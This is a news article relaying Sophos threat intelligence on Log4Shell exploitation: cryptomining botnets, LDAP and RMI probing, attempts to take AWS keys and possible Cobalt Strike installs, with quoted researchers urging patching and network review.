New threat intelligence from Sophos following the Apache Log4Shell vulnerability
Sophos has provided new threat intelligence following the reporting of the Apache Log4Shell vulnerability.
The information shows how cyberattackers are already exploiting or attempting to exploit unpatched systems. This is detailed in the SophosLabs Uncut article, Log4Shell Hell: Anatomy of an Exploit Outbreak.
Sophos says it's seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far. It says cryptomining botnets are among the earliest attack adopters, with botnets focusing on Linux server platforms, which are particularly exposed to this vulnerability. The company has also seen attempts to extract information from services, including Amazon Web Services keys and other private data.
Sophos has observed that attempts to exploit network services start by probing for different types. It says around 90% of the probes it detected were focused on the Lightweight Directory Access Protocol (LDAP). A smaller number of probes targeted Javas Remote Interface (RMI), but Sophos researchers say there seem to be a larger variety of unique RMI-related attempts.
"Expect adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging for ransomware," says Sophos.
Sean Gallagher, senior threat researcher at Sophos, and author of the SophosLabs Uncut article says that since Dec 9th, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability.
"Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability," he says.
"This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet. The most recent intelligence suggests attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts. There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks."
He says the Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange.
"Once defenders know what software is vulnerable, they can check for and patch it," says Gallagher.
"However, Log4Shell is a library used by many products. It can therefore be present in the darkest corners of an organisations' infrastructure, for example, any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security."
Sophos expects the speed with which attackers harness and use the vulnerability will only intensify and diversify over the coming days and weeks. It says once an attacker has secured access to a network, then any infection can follow. So alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.
New and additional information on how Log4Shell works is also available in the Sophos Naked Security article, Log4Shell Explained How it Works, Why You Need to Know, and How to Fix It, by Paul Ducklin.
"Technologies including IPS, WAF and intelligent network filtering are all helping to bring this global vulnerability under control," Sophos principal research scientist, Paul Ducklin.
"But the staggering number of different ways that the Log4Shell 'trigger text' can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us."
He says the very best response is clear, patch or mitigate your systems right now. "Our article provides practical advice that explains how the vulnerability works, why it works, what it can do, and how to fix it."